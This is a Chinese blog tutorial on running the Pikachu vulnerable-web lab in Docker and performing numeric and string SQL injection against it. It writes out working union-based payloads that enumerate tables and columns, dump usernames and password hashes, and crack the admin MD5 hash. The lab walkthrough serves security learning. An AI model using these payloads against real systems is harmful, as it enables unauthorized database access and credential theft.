Docker搭建pikachu靶场以及SQL-Inject中的数字型与字符型注入

于 2024-10-09 08:47:12 发布
阅读量426 收藏 5
点赞数 7
文章标签: docker sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42780280/article/details/142759298
版权

  • docker安装pikachu(参考文章

    1. 拉取资源到本地:

      docker pull area39/pikachu

    2. 启动pikachu靶场,将容器命名为pikachu,映射web访问端口为9002,mysql数据库端口映射为23306:

      docker run --name pikachu -d -p 9002:80 -p 23306:3306 area39/pikachu

    要映射两个端口,不然会启动后会打不开靶场

    1. 访问pikachu,进行系统初始化(首次打开要初始化靶场中的数据库),访问http://ip:9002进性初始化,之后点击“点击这里”就可以进入靶场了。在这里插入图片描述

      在这里插入图片描述

  • pikachu靶场中的SQL-Inject练习

    1. 数字型注入

      选择查询值1,并使用BurpSuite抓包 在这里插入图片描述

      在这里插入图片描述
      可以看到提交的内容id=1&submit=%E6%9F%A5%E8%AF%A2,将其发送到Repeater并在id=
      构造绕过语句id=1'&submit=%E6%9F%A5%E8%AF%A2,看到报错回显得出数据库为MySQL;
      在这里插入图片描述
      构造绕过语句id=1"&submit=%E6%9F%A5%E8%AF%A2,继续报错;
      构造绕过语句id=1 and 1=1&submit=%E6%9F%A5%E8%AF%A2,回显id=1的查询界面;
      构造绕过语句id=1 and 1=2&submit=%E6%9F%A5%E8%AF%A2,回显所查询id不存在,为整型注入;
      开始查询:

      1. 获取列数:
        id=1 order by 2&submit=%E6%9F%A5%E8%AF%A2
      2. 查数据库名:
        id=1 union select database(),version()&submit=%E6%9F%A5%E8%AF%,得到数据库名pikachu
      3. 查表名:
        id=1 union select group_concat(table_name),1 from information_schema.tables where table_schema=database()&submit=%E6%9F%A5%E8%AF%,得到表名httpinfo, member, message, users, xssblind
      4. 查列名:
        id=1 union select group_concat(column_name),1 from information_schema.columns where table_name='users'&submit=%E6%9F%A5%E8%AF%,得到字段名USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password, level
      5. 查数据:
        id=1 union select username,password from pikachu.users&submit=%E6%9F%A5%E8%AF%,得到admin以及加密过的密码e10adc3949ba59abbe56e057f20f883e,丢到在线MD5解密网站得到admin明文密码123456
        在这里插入图片描述

    2. 字符型注入

      参数直接拼接在URL中:
      在这里插入图片描述 构造?name=vince'&submit=%E6%9F%A5%E8%AF%A2,有报错; 在这里插入图片描述
      构造?name=vince' '&submit=%E6%9F%A5%E8%AF%A2,正常回显查询结果,所以可以用单引号闭合语句;
      构造?name=vince'#&submit=%E6%9F%A5%E8%AF%A2,为空回显,不能用#注释,需要换一种注释方式;
      构造?name=vince' -- &submit=%E6%9F%A5%E8%AF%A2,正常回显查询结果,所以可以用-- 来注释;

      1. 接着就是一样的查列数:
        构造?name=vince' order by 2-- &submit=%E6%9F%A5%E8%AF%A2,列数为2;
      2. 查数据库名和版本号:
        构造?name=vince' union select database(),version()-- &submit=%E6%9F%A5%E8%AF%A2
        在这里插入图片描述
      3. 查表名:
        构造?name=vince' union select group_concat(table_name),1 from information_schema.tables where table_schema=database()-- &submit=%E6%9F%A5%E8%AF%A2
        在这里插入图片描述
      4. 查列名:
        构造?name=vince' union select group_concat(column_name),1 from information_schema.columns where table_schema=database()-- &submit=%E6%9F%A5%E8%AF%A2
        在这里插入图片描述
      5. 查数据:
        构造?name=vince' union select username,password from pikachu.users-- &submit=%E6%9F%A5%E8%AF%A2
        在这里插入图片描述
gjhaoiaao
关注
Centos7安装Docker搭建Pikachu靶场
小啊宇的博客
10-19 4855
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。
【kali】docker搭建pikachu靶场并配置所需环境
qq_52453830的博客
10-13 6448
Kali搭建pikachu靶场
【网络安全的神秘世界】借助 Docker 轻松搭建 Pikachu 靶场教程
菜鸟小羊的博客
05-31 968
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。复制命令后,去kali安装。访问本地地址8080端口。
dockerpikachu靶场环境搭建
aiwodefangzhuer的博客
01-20 9383
dockerpikachu靶场环境搭建 安装pikachu 1、搜索关于pikachu的镜像 docker search pikachu 2、下载第一个镜像 docker pull area39/pikachu 3、遇到下载不起的情况,可以使用docker国内镜像加速 创建或修改 /etc/docker/daemon.json 文件,修改为如下形式: { “registry-mirrors”: [ “https://registry.docker-cn.com”, “http://hub-mi
docker服务器版搭建pikachu靶场
weixin_41826065的博客
12-07 1375
docker服务器搭建靶场
[SQL靶场搭建]使用Docker搭建SQLi-LAB靶场
m0_61155226的博客
03-29 2475
SQL注入靶场搭建
Docker搭建Pikachu靶场
内心不种满鲜花就会长满杂草
05-12 9115
启动靶场(没有镜像会先自动下载镜像): docker run -d -p 8000:80 area39/pikachu:latest 访问 ip:8000 端口即可,首次访问点击初始化安装 假若没有docker,可先进行docker的下载 传送门 -》ubuntu/Kalidocker的安装 ...
【渗透测试】Centos7安装Docker搭建Pikachu靶场
fly_enum的博客
01-16 853
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意
如何正确使用docker搭建靶场--pikachu
qq_59020256的博客
01-03 1968
注意这里有两个相同的镜像,因此需要指定版本,否则会出现错误,因此需要输入docker images进行查看。这里就有相应的版本,找到php5.几的版本复制链接,在虚拟机上安装即可。4.拉取镜像,这里是以pikachu为例因此需要一个php5的版本。将pikachu文件以zip的形式压缩然后拖到虚拟机。8.将pikachu文件放入容器this的app。(1)打开代理,输入docker hub。9.进入容器,并将pikachu文件解压。(2)进入Docker Hub。(4)点击进去,带点击Tag。
DOCKER容器-docker容器-搭建pikachu靶场
wrypot的博客
06-11 1062
docker run -d --name pikachu01 -p 1111:80 area39/pikachu #把dockers的镜像变成一个容器,-d 后台运行,-p端口映射,把docker镜像nginx的80端口映射到Linux的8888端口上; docker ps #容器的查看 docker stop 2946f38aa078 #通过容器的id号来停止一个运行的容器 docker ps -a #查看所有的历史容器 docker start 2946f38aa078 #重启启动之前被关闭
ubantu下搭建docker搭建sql注入靶场
世间繁华梦一出
12-08 1631
文章目录什么是Docker?Docker基本语法在docker搭建sql-labs 什么是Docker? Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源。 Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。 容器是完全使用沙箱机制,相互之间不会有任何接口(类似 iPhone 的 app),更重要的是容器性能开销极低。 说白了就是一个开销更低,安装更便捷的虚拟机。 Doc
Docker(十三):离线安装docker社区版(docker-18.06.3-ce)
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
03-18 2万+
🟢 Docker(十三):离线安装docker社区版(docker-18.06.3-ce)
Docker搭建漏洞靶场
weixin_67503304的博客
06-27 3373
Docker搭建漏洞靶场--简便方法(包含vulhub vulapp vulfocus)
pikachu靶场搭建以及搭建问题
weixin_51334923的博客
10-20 9579
前言 pikachu是一个适合Web渗透测试学习的小白们进行训练的本地靶场,并且已经在github上开源了。 它是一个综合性的靶场: 非常适合新手练习,接下来就简单的看一下它如何在Windows上搭建吧!!! Apache与MySQL环境搭建 然后这边推荐用phpstudy_pro进行Apache以及mysql的环境搭建。 就以Windows系统来进行安装教学,可以省去很多繁琐的步骤!! 小皮面板(phpstudy) - 让天下没有难配的服务器环境! (xp.cn) 打开官网,点击下载,
Docker(十五):Docker-compose 实现服务弹性伸缩
热门推荐
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
03-24 2万+
🟢 Docker(十五):Docker-compose 实现服务弹性伸缩
Docker 环境下 Nginx 监控实战:使用 Prometheus 实现 Nginx 性能监控的完整部署指南
敲代码别忘了喝上一杯凉白开。
10-08 486
本文详细介绍了如何在 Docker 环境下,通过配置 Nginx 的 `stub_status` 模块,并结合 Prometheus 和 Nginx Prometheus Exporter,实现对 Nginx 服务的性能监控。文章首先讲解如何确认 Nginx 是否已启用 `with-http_stub_status_module` 模块,随后通过修改 Nginx 配置文件,设置监控访问端点。
DockerDocker 容器的使用指南:如何进入容器并运行命令
人生苦短,睡觉要紧,睡醒再说
10-01 1839
Docker 是一个开源的应用容器引擎,能轻松创建、部署和运行分布式应用。本文将介绍如何进入 Docker 容器并在其运行命令,包括常用命令示例与说明。
Docker从入门到进阶】03.进阶应用
10-03 1668
创建自定义网络这样创建的网络默认使用桥接模式。查看网络将容器连接到自定义网络连接现有容器到网络断开容器与网络的连接多服务配置Docker Compose 文件允许您通过 service 块定义多个服务。每个服务定义了一个 Docker 容器,使用这些容器共同协作以完成一个复杂的应用。网络与卷管理支持定义自定义网络,方便应用内不同服务之间的通信。通过卷的使用实现数据的持久化和共享。在可以明确声明各服务间的依赖关系。环境变量和配置管理可以在 Compose 文件嵌入环境变量,或使用。
Kubernetes--深入理解Pod资源管理
最新发布
flytalei的博客
10-08 587
在 Kubernetes,资源是指各种对象类,例如Pods、Services、Deployments 等,API是这些资源的入口点。通过 kubectl,用户可以创建、查看、更新、删除集群的各种资源(如 Pod、Service、Deployment 等),并且可以调试和管理 Kubernetes 集群。在 Kubernetes ,API 是与集群交互的核心,API 版本管理允许 Kubernetes 保持向后兼容性,并引入新功能而不破坏现有的功能。这种策略用于只运行一次的任务或非常短暂的容器。
docker搭建sql靶场
07-27
要使用Docker搭建SQLi-LAB靶场,你可以按照以下步骤进行操作: 1. 首先,你需要安装Docker。你可以使用以下命令来安装所需的软件包: ``` yum install -y yum-utils device-mapper-persistent-data lvm2 yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo yum list docker-ce --showduplicates | sort -r yum install docker-ce ``` 2. 如果之前已经安装过Docker,你可能需要先卸载旧版本,然后再重新安装。你可以使用以下命令来卸载旧版本: ``` yum remove docker docker-common docker-selinux docker-engine ``` 3. 安装完成后,你可以使用以下命令来验证Docker是否成功安装: ``` docker version ``` 4. 接下来,你需要拉取SQLi-LAB的Docker镜像。你可以使用以下命令来搜索并拉取镜像: ``` docker search sqli-labs docker pull acgpiano/sqli-labs ``` 5. 拉取完成后,你可以使用以下命令来运行SQLi-LAB镜像: ``` docker run -dt --name sqli -p 8888:80 --rm acgpiano/sqli-labs ``` 通过以上步骤,你就可以使用Docker成功搭建SQLi-LAB靶场了。你可以通过访问`http://localhost:8888`来访问SQLi-LAB靶场。 #### 引用[.reference_title] - *1* *2* [[SQL靶场搭建]使用Docker搭建SQLi-LAB靶场](https://blog.csdn.net/m0_61155226/article/details/129833018)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [docker部署常见的SQL注入靶场](https://blog.csdn.net/qq_52109950/article/details/129169073)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值